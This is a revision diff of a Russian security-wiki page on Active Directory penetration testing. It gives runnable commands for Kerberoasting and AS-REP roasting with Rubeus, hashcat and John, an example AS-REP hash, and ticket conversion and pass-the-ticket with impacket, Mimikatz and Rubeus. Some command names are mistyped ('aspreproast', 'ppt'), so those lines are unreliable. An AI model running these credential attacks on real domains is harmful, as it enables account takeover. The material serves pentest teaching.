Active directory — различия между версиями
Материал из InformationSecurity WIKI
Drakylar (обсуждение | вклад) м (→Учетные данные) |
Drakylar (обсуждение | вклад) м (→Оффлайн перебор) |
||
| Строка 53: | Строка 53: | ||
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
hashcat -m 13100 --force -a0 ./tickget.kerberoast ./pass.txt | hashcat -m 13100 --force -a0 ./tickget.kerberoast ./pass.txt | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | |||
| + | ==== ASP-REP roasting==== | ||
| + | |||
| + | Если у Kerberos отключена предварительная аутентификация, то сервер вернет ASP-REP, зашифрованная часть которого подписана клиентским ключем на кого он выписан. | ||
| + | |||
| + | ===== Получить хеш ===== | ||
| + | |||
| + | Rubeus | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | Rubeus.exe aspreproast | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | ===== Преобразования хеша ===== | ||
| + | |||
| + | Начальный хеш | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | $krb5asrep$spot@offense.local:3171EA207B3A6FDAEE52BA247C20362E$56FE7DC0CABA8CB7D3A02A140C612A917DF3343C01BCDAB0B669EFA15B29B2AEBBFED2B4F3368A897B833A6B95D5C2F1C2477121C8F5E005AA2A588C5AE72AADFCBF1AEDD8B7AC2F2E94E94CB101E27A2E9906E8646919815D90B4186367B6D5072AB9EDD0D7B85519FBE33997B3D3B378340E3F64CAA92595523B0AD8DC8E0ABE69DDA178D8BA487D3632A52BE7FF4E786F4C271172797DCBBDED86020405B014278D5556D8382A655A6DB1787DBE949B412756C43841C601CE5F21A36A0536CFED53C913C3620062FDF5B18259EA35DE2B90C403FBADD185C0F54B8D0249972903CA8FF5951A866FC70379B9DA | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | Если у вас нет 23 после второго доллара, то надо добавить. Результат: | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | $krb5asrep$23$spot@offense.local:3171ea207b3a6fdaee52ba247c20362e$56fe7dc0caba8cb7d3a02a140c612a917df3343c01bcdab0b669efa15b29b2aebbfed2b4f3368a897b833a6b95d5c2f1c2477121c8f5e005aa2a588c5ae72aadfcbf1aedd8b7ac2f2e94e94cb101e27a2e9906e8646919815d90b4186367b6d5072ab9edd0d7b85519fbe33997b3d3b378340e3f64caa92595523b0ad8dc8e0abe69dda178d8ba487d3632a52be7ff4e786f4c271172797dcbbded86020405b014278d5556d8382a655a6db1787dbe949b412756c43841c601ce5f21a36a0536cfed53c913c3620062fdf5b18259ea35de2b90c403fbadd185c0f54b8d0249972903ca8ff5951a866fc70379b9da | ||
| + | </syntaxhighlight> | ||
| + | ===== Перебор хеша ===== | ||
| + | |||
| + | JohnTheRipper | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | john --wordlist=dict.txt krbt.hashes | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | Hashcat | ||
| + | <syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" > | ||
| + | hashcat -m18200 '$krb5asrep$23$spot@offense.local:3171EA207B3A6FDAEE52BA247C20362E$56FE7DC0CABA8CB7D3A02A140C612A917DF3343C01BCDAB0B669EFA15B29B2AEBBFED2B4F3368A897B833A6B95D5C2F1C2477121C8F5E005AA2A588C5AE72AADFCBF1AEDD8B7AC2F2E94E94CB101E27A2E9906E8646919815D90B4186367B6D5072AB9EDD0D7B85519FBE33997B3D3B378340E3F64CAA92595523B0AD8DC8E0ABE69DDA178D8BA487D3632A52BE7FF4E786F4C271172797DCBBDED86020405B014278D5556D8382A655A6DB1787DBE949B412756C43841C601CE5F21A36A0536CFED53C913C3620062FDF5B18259EA35DE2B90C403FBADD185C0F54B8D0249972903CA8FF5951A866FC70379B9DA' -a 3 /usr/share/wordlists/rockyou.txt | ||
</syntaxhighlight> | </syntaxhighlight> | ||
Версия 20:34, 18 января 2022
Страница посвящена тестированию на проникновение сетей Active Directory на Windows OS.
Содержание
Общая информация о сети
Домен
Доменный контроллер
Доменные компьютеры
Дополнительная информация о сети
Список пользователей
Без перебора
С перебором
Время сети
NTP
HTTP
Сетевая информация
IP
Сервисы
Получение начального доступа
Анонимный доступ
Учетные данные
Сетевой перебор учетных данных (пароля)
Перебор учетных данных по протоколам лучше смотреть тут http://itsecwiki.org/index.php/Brute_force
Оффлайн перебор
TGS
Если у вас есть TGS-ticket для доступа к сервису, то вы можете пробрутить пароль учетки от которой будет идти запрос.
Hashcat
1 hashcat -m 13100 --force -a0 ./tickget.kerberoast ./pass.txt
ASP-REP roasting
Если у Kerberos отключена предварительная аутентификация, то сервер вернет ASP-REP, зашифрованная часть которого подписана клиентским ключем на кого он выписан.
Получить хеш
Rubeus
1 Rubeus.exe aspreproast
Преобразования хеша
Начальный хеш
1 $krb5asrep$spot@offense.local:3171EA207B3A6FDAEE52BA247C20362E$56FE7DC0CABA8CB7D3A02A140C612A917DF3343C01BCDAB0B669EFA15B29B2AEBBFED2B4F3368A897B833A6B95D5C2F1C2477121C8F5E005AA2A588C5AE72AADFCBF1AEDD8B7AC2F2E94E94CB101E27A2E9906E8646919815D90B4186367B6D5072AB9EDD0D7B85519FBE33997B3D3B378340E3F64CAA92595523B0AD8DC8E0ABE69DDA178D8BA487D3632A52BE7FF4E786F4C271172797DCBBDED86020405B014278D5556D8382A655A6DB1787DBE949B412756C43841C601CE5F21A36A0536CFED53C913C3620062FDF5B18259EA35DE2B90C403FBADD185C0F54B8D0249972903CA8FF5951A866FC70379B9DA
Если у вас нет 23 после второго доллара, то надо добавить. Результат:
1 $krb5asrep$23$spot@offense.local:3171ea207b3a6fdaee52ba247c20362e$56fe7dc0caba8cb7d3a02a140c612a917df3343c01bcdab0b669efa15b29b2aebbfed2b4f3368a897b833a6b95d5c2f1c2477121c8f5e005aa2a588c5ae72aadfcbf1aedd8b7ac2f2e94e94cb101e27a2e9906e8646919815d90b4186367b6d5072ab9edd0d7b85519fbe33997b3d3b378340e3f64caa92595523b0ad8dc8e0abe69dda178d8ba487d3632a52be7ff4e786f4c271172797dcbbded86020405b014278d5556d8382a655a6db1787dbe949b412756c43841c601ce5f21a36a0536cfed53c913c3620062fdf5b18259ea35de2b90c403fbadd185c0f54b8d0249972903ca8ff5951a866fc70379b9da
Перебор хеша
JohnTheRipper
1 john --wordlist=dict.txt krbt.hashes
Hashcat
1 hashcat -m18200 '$krb5asrep$23$spot@offense.local:3171EA207B3A6FDAEE52BA247C20362E$56FE7DC0CABA8CB7D3A02A140C612A917DF3343C01BCDAB0B669EFA15B29B2AEBBFED2B4F3368A897B833A6B95D5C2F1C2477121C8F5E005AA2A588C5AE72AADFCBF1AEDD8B7AC2F2E94E94CB101E27A2E9906E8646919815D90B4186367B6D5072AB9EDD0D7B85519FBE33997B3D3B378340E3F64CAA92595523B0AD8DC8E0ABE69DDA178D8BA487D3632A52BE7FF4E786F4C271172797DCBBDED86020405B014278D5556D8382A655A6DB1787DBE949B412756C43841C601CE5F21A36A0536CFED53C913C3620062FDF5B18259EA35DE2B90C403FBADD185C0F54B8D0249972903CA8FF5951A866FC70379B9DA' -a 3 /usr/share/wordlists/rockyou.txt
TGT-билет
Как Cookie у браузера, он требуется для получения TGS который в свою очередь используется для подключения к сервисам. Если вы нашли файл с TGT-ключем, то у него есть два формата: kirbi & ccache, поэтому надо сконвертировать.
Конвертация
https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketConverter.py
1 ./ticket_converter.py admin.ccache admin.kirbi
2 ./ticket_converter.py admin.kirbi admin.ccache
Импорт тикета
!Не забудьте установить время то же, пункт выше!
.ccache
Rubeus
1 .\Rubeus.exe ppt /ticket:new_ticket.ccache
Mimikatz
1 mimikatz # kerberos::ptt new_ticket.ccache
Bash
1 export KRB5CCNAME=./test.ccache
